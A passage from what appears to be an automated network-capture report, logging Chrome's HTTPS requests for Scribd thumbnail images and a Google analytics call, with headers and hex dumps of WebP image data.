                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC778INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 8556
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "w7JLsw489hF6eiMDevkd4uhjqdTI6X7jSgYro9lp+9U"
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Info: ifsz=19990 idim=149x198 ifmt=png ofsz=8556 odim=149x198 ofmt=webp
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Served-By: vpop-kiad7010251
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Stats: io=1
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 112
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Age: 554165
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-kigq8000157-CHI, cache-nyc-kteb1890038-NYC
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 61, 1
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522379.818876,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: 52 49 46 46 64 21 00 00 57 45 42 50 56 50 38 20 58 21 00 00 10 74 00 9d 01 2a 95 00 c6 00 3e 6d 2c 91 45 a4 22 a1 96 eb 97 20 40 06 c4 a0 0b eb e5 9d a3 f6 27 d4 a4 50 f2 ef 8b 7d 8f e6 7c 89 be 37 bd 6f fc 0f 58 7b 7c ff b2 fa 15 fe 6f fe 87 d6 3b fe 9f ed 57 bd 9f ef 7e 98 1d 4f 1e 85 ff b2 5d 6d 5f e0 bf f2 7a 6c 60 ca 71 ff f4 be 0d f9 59 f8 4f ef 5f b9 9f df fd cf f2 17 d8 4e a3 5d e5 ff 2f fc 57 a5 de 02 fc c4 ff 63 d4 2f f2 bf ea 1e 7f 90 bf eb ff df fa 0d 77 87 cc e7 ec ff f0 fa 3d f6 53 d8 0f f5 ab d3 9f f6 fe 24 bf 86 ff 81 fb 29 f0 03 fd 37 fc 0f fe df f3 7e cc 1a 0e 7a d7 d8 33 f6 37 d3 9f d9 2f ef 27 b3 cf ee 22 7f 9c 16 81 da 4b c9 10 b6 88 ba da 46 fe 20 b9 de e8 ae 0d e7 df 8a ee cb b9 54 cd dc 7d ed 81 d0 8e 5f 65 eb 62 33 ff 6e 5f 6d d4
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RIFFd!WEBPVP8 X!t*>m,E" @'P}|7oX{|o;W~O]m_zl`qYO_N]/Wc/w=S$)7~z37/'"KF T}_eb3n_m
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: 6d df 09 d9 29 7a 9b 6a 7f af 19 87 fd d9 bb 27 5b 5a 2a b4 b6 af 20 73 1e b3 6a 0a 8e 4b a0 63 d9 8c 47 8e 7d 32 09 d1 8b 12 a0 7f 34 2a 29 89 5e ed 6c 1b 92 1c 80 77 97 1c 29 af 47 15 51 06 b1 34 c7 64 b2 cd be 69 59 cc 66 43 84 ae 4f ba f5 f2 a2 43 e5 cd 93 df 3b c4 07 16 7c f6 cc a8 2a 12 ba 71 b0 35 31 4f cf 47 1e cf 2f 21 74 7b 77 93 72 65 28 d5 26 d3 35 a9 05 d6 ea 29 0d 91 c3 90 e1 db 14 7a ad 91 f0 48 1e de d3 7c 7c 47 22 5b 4e db 50 06 92 22 2e f7 ad 7c b8 52 66 49 49 22 0f f2 e1 9a 89 c7 93 44 09 a2 12 a7 65 db a4 af 2f b9 c8 36 9b dc 47 c6 81 d0 50 24 88 73 ff 6f 60 11 bf 8f 1c 67 38 dc b5 32 b1 a2 e6 12 d7 11 9f 0e ec 52 b5 09 e2 4c d8 44 54 48 1c 67 6e f4 6d 35 7a 03 e1 e7 2f 0f e3 9b a8 24 9d d7 9a 3a ef af f8 05 03 8d 2f 49 13 2a 1b 3a 63
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: m)zj'[Z* sjKcG}24*)^lw)GQ4diYfCOC;|*q51OG/!t{wre(&5)zH||G"[NP".|RfII"De/6GP$so`g82RLDTHgnm5z/$:/I*:c
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: a7 c1 70 07 cc 55 79 f3 c7 75 ea 73 93 28 12 9a eb cf 27 f8 c1 fb 8e b9 96 6b 24 bd f0 ad 41 4e b7 da 68 b2 60 42 98 03 3d 62 a6 e4 dc 51 51 cf 3c 29 60 2d d3 6e dd b9 3b 77 b7 d5 8b af 30 95 ad e6 8d ac 49 3f f7 7c b0 67 30 17 f7 c8 83 8b 19 ba 30 88 55 16 e9 b2 ed 12 c9 57 7f c5 0f c8 28 72 c2 80 54 40 dc 7e 10 e4 5c f3 0b 2e 3a 18 d9 02 bb bf b7 2c 05 1a 41 85 df ee ec 40 a8 67 59 56 9c 5a 36 90 6b 85 94 c2 64 b8 78 35 90 62 a1 27 bb 56 1a df c0 fc 1f 7f 89 bb f6 f8 de 37 d8 27 11 fe 9e c7 6b c6 c5 1a 2a ad 4c a3 d7 53 15 ac ee ef 52 c6 c7 58 ce 04 7b f9 56 f4 c6 5d 90 c0 d1 44 c5 df ef cc a7 b1 c1 a1 52 8b 22 cf 5c c3 f2 16 f4 71 10 fa 2d bf 76 69 73 97 1c 6d 58 a0 5d da 7a de 68 a7 fc 43 27 c0 c9 4c 97 f8 c7 db dd 0b 09 78 3c dc ca 3b 0b 89 ee c4 18
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: pUyus('k$ANh`B=bQQ<)`-n;w0I?|g00UW(rT@~\.:,A@gYVZ6kdx5b'V7'k*LSRX{V]DR"\q-vismX]zhC'Lx<;
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: 10 28 b4 61 61 1e 7c 5e ee 75 5c f8 b8 d5 ca 1c ea 9e 04 a0 a8 7f 3d 21 51 f5 31 0b d0 e5 92 b4 89 e3 38 da 60 34 b5 e6 2e 6b 2a de 55 48 e4 30 65 88 56 3f 81 e3 c4 88 83 96 e8 33 46 86 70 75 1e 96 da 8e 25 fd 64 53 80 68 a0 d0 d0 ac 51 75 b5 f1 93 67 72 ff dd b9 89 a7 32 b7 09 d5 eb 53 69 49 24 bb ff a3 ec 3d ac 80 df 8e de de 4e 35 fc 84 ad 4e 24 e2 da d3 ed 2d a8 1f 04 42 a9 9e 93 fa 5c 3c 9a 70 13 c5 61 ea 53 ac 81 97 87 af 51 95 49 ab 31 46 e5 6d ef b0 32 6d a1 ec a9 32 bc fb c4 78 c6 fb 5d 0e ea 35 67 57 c2 70 4a bf 7a 63 6b 75 5d bc e7 13 b2 f7 b3 7d ac 72 17 cb 1e 92 ec 9f 78 7c d4 0f 8a f0 8e 35 6c 69 0b 30 fc d1 14 f8 34 d8 45 d4 45 f5 1a 03 2e 67 46 24 f5 c4 5e 4a cc f9 29 79 67 ab ba 9a e7 95 5e eb d4 06 55 a7 c4 2f d7 55 37 a4 f2 a0 b2 13 d6
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (aa|^u\=!Q18`4.k*UH0eV?3Fpu%dShQugr2SiI$=N5N$-B\<paSQI1Fm2m2x]5gWpJzcku]}rx|5li04EE.gF$^J)yg^U/U7
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: 68 f7 a8 6e ed b4 f9 e2 7c cf 9f f6 38 1d ec 1d 0b 07 07 2e a9 af 6b cb 68 bb 52 04 0f d6 39 76 ba 9a ff 80 c3 ae 66 7d fe f7 41 16 6a 13 be 64 7a 79 a1 c5 a9 59 b7 82 e6 93 7d e6 62 ab b6 96 b9 5e 8e 41 4c c6 e1 f0 0c 5a e1 b1 29 bd d1 e2 41 fe 45 1e e3 28 91 03 30 be 3a 9d 42 27 5d e8 a9 10 af d7 fc 8b f0 e2 eb b1 fe 21 78 50 d3 0e 93 7c 5c ea 25 78 7f 38 b9 88 4a fb 7a 79 ad 94 df 1a 68 ca d8 c4 44 c4 cd 08 85 db 02 9f 78 0b d3 79 ea 1d a3 3d 82 92 d4 86 95 f2 d0 21 5c a0 e2 d5 41 4d db 4c 93 cc 68 a5 1f d2 02 5b 4d f6 a5 77 10 ff 1e 89 8d 9b 89 05 60 29 3b 4f c2 0c a3 4d 7d 11 2f a9 af 02 87 c4 2a a7 26 ce c5 31 ab d8 ca c9 cd ee 33 58 4f 39 0a 2c a1 f9 0d a2 32 98 db 88 e5 91 c0 76 94 66 a2 d3 c1 0f 48 d3 91 b9 33 80 35 7c 87 91 f4 b5 58 b2 1f dc 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: hn|8.khR9vf}AjdzyY}b^ALZ)AE(0:B']!xP|\%x8JzyhDxy=!\AMLh[Mw`);OM}/*&13XO9,2vfH35|X}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: cf 7d 1e 0c 6b d7 00 9a 5b c8 47 63 1a 2b 9f 49 fe 76 90 a2 11 d1 a1 28 37 26 be fb 2f 4d 56 8d aa e0 95 c3 29 cf aa 73 04 6c ab 07 ca 83 5e ed 14 d9 c9 8a d7 41 d5 59 85 ed ab a6 e3 09 57 68 49 8f ef 4c 00 49 32 ef f0 99 7f e6 97 b3 df f1 4f 73 16 86 0d db d6 a0 cb 71 01 67 9d ca cf 86 90 a3 d0 f1 47 2d 03 41 73 c4 ae 1e ca a7 16 49 eb 4a 44 b7 79 e8 a1 17 4e 20 f7 bc 7d c7 61 2a b4 48 5f 2f 81 b4 6a c9 a5 46 f9 ce 9c 81 db a6 8f 5c 4e fe a8 69 40 ae e9 bc 3b 80 f5 0e 88 7b 9b 70 cb cd de 4b a3 62 18 f1 da f7 0a d3 3b 8f f9 b9 d2 93 a3 f1 1e cf 90 e0 40 96 4a a1 39 3c 0d c8 02 d5 5e 8f f8 13 2e 75 d0 a8 4f 45 7b 47 64 09 ea bb f1 bb fd df 65 d3 0b 2f 4f 03 cc ec 72 a0 95 fd 3a b8 fb d0 ec 0a 08 be 10 b2 5f 7a d0 a1 0c ef 5d 46 ef 65 3a 59 9b 8b 63 dc 50
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: }k[Gc+Iv(7&/MV)sl^AYWhILI2OsqgG-AsIJDyN }a*H_/jF\Ni@;{pKb;@J9<^.uOE{Gde/Or:_z]Fe:YcP
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC288INData Raw: 37 88 fb f2 d2 1e 77 27 90 e7 ca 6f 4d 80 76 a1 2b e9 44 e0 98 6b 8f 8f e6 9b db 38 5e b6 64 44 07 85 af 1b f7 95 17 bd 6d a3 54 68 9c 41 a2 d0 7d 70 80 ea 10 32 c5 e0 de 17 cb 9f 63 55 51 e7 fd ae 9b be 6e 1e 04 49 2f 41 05 be c2 e0 e3 5f 06 41 ce b1 6d f1 89 5a cc 22 ff 0c 32 35 76 2c ff c4 e6 1d 6d 6a 7b 1a be 1b b4 e4 38 aa 70 41 a2 c0 7b 2f fc e0 79 e5 65 34 38 68 55 a1 08 fa 2b 3b f8 c9 f4 ba 0c d9 59 75 6b a5 ff b7 bb b2 06 ed 70 b1 33 61 d9 4d 02 89 49 c4 11 6c b8 cd fa b3 7a 55 c1 42 c6 fa 28 fa a6 81 22 e4 d3 c6 6a 81 54 09 3c 07 c2 7f 12 11 b9 55 1b 4c 9b f2 85 10 e0 6f 52 00 0e 6c 64 09 23 da ca 4f a0 22 e1 19 61 a5 63 f0 71 00 79 80 72 94 b4 14 bd cd 1f ea f5 d4 fd 2f b3 f4 21 fd e6 9a 00 01 c9 02 18 6e f3 70 95 82 af 2e 6f 25 f0 12 b2 8d 7c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 7w'oMv+Dk8^dDmThA}p2cUQnI/A_AmZ"25v,mj{8pA{/ye48hU+;Yukp3aMIlzUB("jT<ULoRld#O"acqyr/!np.o%|


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        101192.168.2.1649842151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC645OUTGET /img/word_document/356032151/149x198/db7a11388a/1731623834?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-1-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC775INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 9306
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/webp
                                                                                                                                                                                                                                                                                                                                                                                        Etag: "ZCKRv7vWCsqwVpO89myByrq0DkfNxseRO3G1RbIXzwA"
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Info: ifsz=22143 idim=149x198 ifmt=png ofsz=9306 odim=149x198 ofmt=webp
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Io-Served-By: img09-us-east4
                                                                                                                                                                                                                                                                                                                                                                                        Fastly-Stats: io=1
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 81
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 204211
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-kigq8000158-CHI, cache-nyc-kteb1890080-NYC
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 46, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522379.821882,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: 52 49 46 46 52 24 00 00 57 45 42 50 56 50 38 20 46 24 00 00 70 77 00 9d 01 2a 95 00 c6 00 3e 65 28 8f 45 a4 22 a1 1a dc a6 00 40 06 44 b6 00 60 0f d3 25 3b e1 7f b5 fe c9 fb 2a 56 ff b6 7f 69 fd 3f fd c3 f6 df e4 8f 69 dd 47 e5 c1 cb df f0 ff bb fe 48 fc d0 fe fd ff 3f fb 97 b9 5f ce 9f f2 fd c1 3f 54 bf dc 7f 80 fc 9d fa 2b fe cf f6 1b dd 17 ed cf a8 4f e9 ff e1 3f eb ff 95 fd ff f9 6e ff 6d fb 55 ee 6f fa a7 fb 2f d9 8f f4 bf 20 9f d1 bf c0 7f ed f6 b9 ff b9 ec 59 fb b9 ec 23 fb 8b ff ff d7 53 f7 1b e1 47 fb 1f fc 1f dc 2f 81 df da 6f fe 9d 9d 1a 73 bc 40 fc df 85 be 54 bd ef ee 27 b2 5e 5f fb 24 d4 cb e7 1f 8a 3f 7d fe 1f da 8f f4 ff f4 7c 59 f8 f9 a8 17 e5 bf d1 3f da ef bd 80 2f d3 7f b2 7f d3 f1 03 d5 a3 c5 5e c0 7f ce 7f b4 7f cd f5 f3 fe df 87 37
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: RIFFR$WEBPVP8 F$pw*>e(E"@D`%;*Vi?iGH?_?T+O?nmUo/ Y#SG/os@T'^_$?}|Y?/^7
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: b9 2f f8 f8 00 a7 35 8a de 45 7a b6 14 09 d7 99 57 6e 8d cb c9 ee 88 90 9d ed 2b 31 7b 34 fa 7c fb e6 63 23 48 4c 6c 07 f4 09 83 70 53 99 b0 c6 73 12 6b 9f f4 c2 d7 10 d2 51 30 7a cd bc 87 2a bd e3 c6 1d 80 d9 71 28 90 f6 46 fa d2 55 e2 1b 20 07 e7 6e 96 ad 23 40 58 32 1d a7 c7 51 e8 3e ea 88 6e bb c5 fc 55 cf f4 15 39 a6 57 7f 74 53 04 dc 45 86 4a e3 5a 11 5d 26 7a 0d f6 93 ae 2f 35 16 fe dd b3 d7 62 55 83 d8 99 51 b6 fc f8 15 8f a4 6f e2 3b 25 9b 38 0d fa d7 4f b9 b2 bf 7c e0 c6 4d 8f db 57 12 1c b5 c7 b7 0b e4 a5 46 27 11 3a 55 1a f4 33 f7 f7 18 4e b4 b8 cb ae 99 63 e9 6b 17 99 ba 44 d6 71 01 5a 32 74 df c1 5e 73 bb 26 bf b2 98 bf 5c e8 f6 e0 60 24 ec 2a 49 75 d5 72 ab f6 9f df a8 ea 7e 5d e8 b7 f2 96 74 4b 04 25 79 31 97 2a 88 2c 16 fb 73 84 79 09 ae
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: /5EzWn+1{4|c#HLlpSskQ0z*q(FU n#@X2Q>nU9WtSEJZ]&z/5bUQo;%8O|MWF':U3NckDqZ2t^s&\`$*Iur~]tK%y1*,sy
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: b1 09 4f c4 ec d5 20 9c 25 6f 96 3c fd ac a0 79 cb 27 44 09 85 06 e2 f0 e6 d5 1e e2 37 f7 32 57 e0 b3 77 71 08 16 d9 f7 6e 3b ff f4 11 71 e3 16 63 fa ba 85 e6 57 79 f3 8c 26 3d fa 97 55 25 88 aa c7 14 f9 4f e3 16 4a 6c 85 89 7f 71 f5 72 dd 1a ab 85 05 07 53 31 74 3b 03 f2 39 06 75 43 b4 8d e8 48 8a f7 f6 3d 78 07 fb 06 b3 55 91 2f 45 82 fd 08 84 d5 05 1b cc ca 55 7e 12 7e 99 46 e3 1b e4 88 72 15 48 46 10 e9 1d f2 d1 30 05 25 e5 7d 93 f5 f1 ec c3 da 3a 50 7a a4 ad db 32 b3 67 b9 4f e9 be 8f f6 9e 72 fd 35 1e ce 76 49 85 3c 4e 87 ce 69 2c fb 1d 5a 9b 3c b4 ac 10 99 3e b3 f3 48 af 34 99 0d 42 21 8b aa dc 2e 0f d1 3d 0c c4 8a ea 68 06 b2 63 ff 6e 20 30 d5 99 8d b4 d0 58 1a 80 4e 7a 83 7e c4 ce 11 44 80 63 9b d1 48 2f d8 95 fd 1f 53 ac f0 06 72 ea 38 12 86 79
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: O %o<y'D72Wwqn;qcWy&=U%OJlqrS1t;9uCH=xU/EU~~FrHF0%}:Pz2gOr5vI<Ni,Z<>H4B!.=hcn 0XNz~DcH/Sr8y
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: 5f 21 12 90 cc 89 a5 e4 ab 56 b8 da 9f b1 ca e8 d1 25 45 4c 67 b0 8d 30 9a 01 32 05 64 73 a5 f8 cb 6c cc de d7 09 42 bd b9 05 a5 c6 4a f7 00 b6 d9 34 05 a7 f3 36 9f bb 37 bd 25 9e 6f b0 76 e5 58 48 69 e2 ce bf 5f 37 f5 56 f2 fe 13 a6 ae 0c 88 07 29 c4 4c 1e 38 d2 1d 80 78 46 92 ea 5b c6 b5 9c 7f d4 ca 95 25 b8 b0 dc 7f 57 7b 82 d6 4f e8 4c 27 3e 11 e8 08 b6 b0 db 58 36 a4 ed 7f 5d 36 da ca d9 28 6e cb 0b 0d 91 42 84 a7 04 bf a4 9f ba cb b7 2b 6a 97 af e7 f1 07 34 28 1c 9f 17 f8 fb 28 b3 8a fa 6d 18 58 c4 4a 89 40 e3 fd 70 ac 92 f8 54 e3 85 2c 0d 18 5d 39 53 d6 c9 19 8c 67 e7 42 5b e2 ed 4e f2 69 8a bc 6d 1e c9 ab e5 79 e0 be 60 2f 37 36 8d 54 98 2f 4f 2b fd 59 b0 e6 99 ea 29 62 81 e9 ca 1d 77 28 ba 83 cc 11 37 cf 65 9e 7f a4 2e 69 3c 43 28 bf fd cb 66 7e
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: _!V%ELg02dslBJ467%ovXHi_7V)L8xF[%W{OL'>X6]6(nB+j4((mXJ@pT,]9SgB[Nimy`/76T/O+Y)bw(7e.i<C(f~
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: 41 04 01 77 a2 d3 f8 ee 7c 60 c1 c5 d6 06 7e a3 00 f3 fb d4 bc d9 c5 94 1c b6 0e 20 1e 2f 27 25 0e e4 47 c3 92 d2 0d b0 c5 0c 21 d0 c7 b2 73 2e 6b 8f a9 8e bb 08 b7 d4 38 47 b8 4a c2 23 f1 d4 da e7 c8 ce 5c 5d 15 9a 7b 5d 16 d6 86 2c ee 99 76 63 b0 c5 0d c4 3a 46 f6 63 48 c7 57 ff 52 4d b1 9a f4 c7 4a 0d 31 ea 86 75 42 12 79 b6 b9 2d 6b dc 97 c9 eb ec 87 71 d2 c7 f7 8d d0 d5 b9 4b b0 1e fa 25 d8 7d ed c6 ff f8 ac 84 e1 aa 70 a4 89 8d 60 64 17 56 f7 62 9f 29 b0 72 24 52 2d c8 cf 05 a9 a9 42 2b 9e 84 96 5d 13 9d 3b 5a 69 9f 0d 1c cc 3f b8 95 d8 1b 38 2c 83 f7 be c7 a1 9e 5d 34 de 9e 0e d3 aa fd ea e1 71 cb b7 de c9 bd 2d 00 87 dc 2b 64 08 f4 bc 7d 20 fa 9d 6e e1 6e 4e a2 c3 16 32 12 e4 30 60 38 76 a6 46 93 31 dc 73 33 a5 0a c4 2e 38 0e ea 79 12 40 6d 90 4b
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Aw|`~ /'%G!s.k8GJ#\]{],vc:FcHWRMJ1uBy-kqK%}p`dVb)r$R-B+];Zi?8,]4q-+d} nnN20`8vF1s3.8y@mK
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1378INData Raw: e5 67 62 fc ff e5 2a ac cb 55 d6 bd 07 88 79 a7 cf 83 c1 34 cf fb 49 d5 94 09 3a 62 8b 81 b6 64 ac 6e 06 01 1c e2 21 62 c0 28 2b 71 10 fe 0e 88 7c 21 b5 ea 9d a6 90 1f df bf 77 9f be a7 de 4d 93 c7 03 9f 61 8b 23 2e b6 30 ac 35 e9 3f 8e 68 1c 95 bc ae 85 7d f9 6f 75 a5 d8 28 49 06 4f 52 15 b8 66 5b 60 50 f1 03 38 f0 b7 87 cd 5c 21 7d 8e e1 ad 37 fc be 7a 84 cf a4 d6 7d e6 42 86 7f fb 57 26 fa 5f b9 f5 93 89 87 6c 92 d1 57 eb 9c 5f 71 95 38 da aa 62 5a 01 fd f8 5b 1e 87 30 7b c6 a1 4a 12 2d af 5c 22 f9 c8 6d fc e3 7f 5c 24 60 62 a4 57 a9 b3 99 07 96 b2 b0 29 37 fd 68 5c a8 55 43 c7 e4 fe 5f c6 69 92 95 80 9b 3d 8c 77 fa c9 61 8b 78 a5 f7 92 4a 9d 9d 74 db 28 ed 41 73 00 94 bc 83 65 71 f3 4d 88 54 54 71 a4 eb c5 a3 d3 07 89 ae 48 23 63 90 ed 08 30 3b 55 b1
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: gb*Uy4I:bdn!b(+q|!wMa#.05?h}ou(IORf[`P8\!}7z}BW&_lW_q8bZ[0{J-\"m\$`bW)7h\UC_i=waxJt(AseqMTTqH#c0;U
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC1038INData Raw: 68 cc 10 fd 24 9e 3c 63 e0 29 f9 95 8c d7 49 7c 8d 06 fa 40 f9 8e 6f 7c a3 57 5c 4f 92 9e cb 63 5d 45 0c 34 8d 1f 6f f9 97 c7 fb 31 57 11 91 e0 bc ec 0a cd cd b3 87 cf bb 53 9d ef 0f 76 ab 11 a0 25 ea d9 3f 97 e4 d7 03 c1 88 53 d3 0e 0f 43 46 b8 10 a7 00 94 00 46 16 34 c9 a8 79 6f 19 3a 1f c5 80 36 4b fb b8 ce 8c c8 8c 9a 75 df 9a d6 2b 4b 53 3c c0 1c 95 e2 2b 53 e8 f3 b0 c2 73 54 8a 63 fc 2f e1 5d 45 c3 7c 6a 58 dc 27 9a 59 f2 c7 b6 5f bc 3b 8b 5f e6 56 dd 4b 63 f9 9c af 1a 8b 3e 6e 1a 13 4e 83 1c 32 6b ae 19 f2 b6 c6 a5 15 52 5d 43 13 41 9d c9 b9 00 c0 3f 1e a9 1c 73 a0 83 0f ca 97 97 07 00 28 b9 95 61 64 c6 4f 41 b7 58 f7 79 ac 2f aa d8 14 c0 ee e4 57 01 7e 4f f6 da 79 fc aa 57 be af 2b 45 7b 7f 84 d7 20 d2 2f 71 83 75 79 e8 df 27 2f d8 5e d7 54 54 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: h$<c)I|@o|W\Oc]E4o1WSv%?SCFF4yo:6Ku+KS<+SsTc/]E|jX'Y_;_VKc>nN2kR]CA?s(adOAXy/W~OyW+E{ /quy'/^TTt


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        102192.168.2.1649837172.217.17.784436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:38 UTC875OUTGET /pagead/form-data/991817613?gtm=45be4c40p3v9178425511z878386455za201zb78386455&gcs=G1--&gcd=13l3l3l3l5l1&dma=0&tcfd=10000&tag_exp=101925629~102067555~102067808~102081485&npa=0&frm=0&pscdl=noapi&auid=1182281480.1733522361&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&ec_mode=a&em=tv.1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: google.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
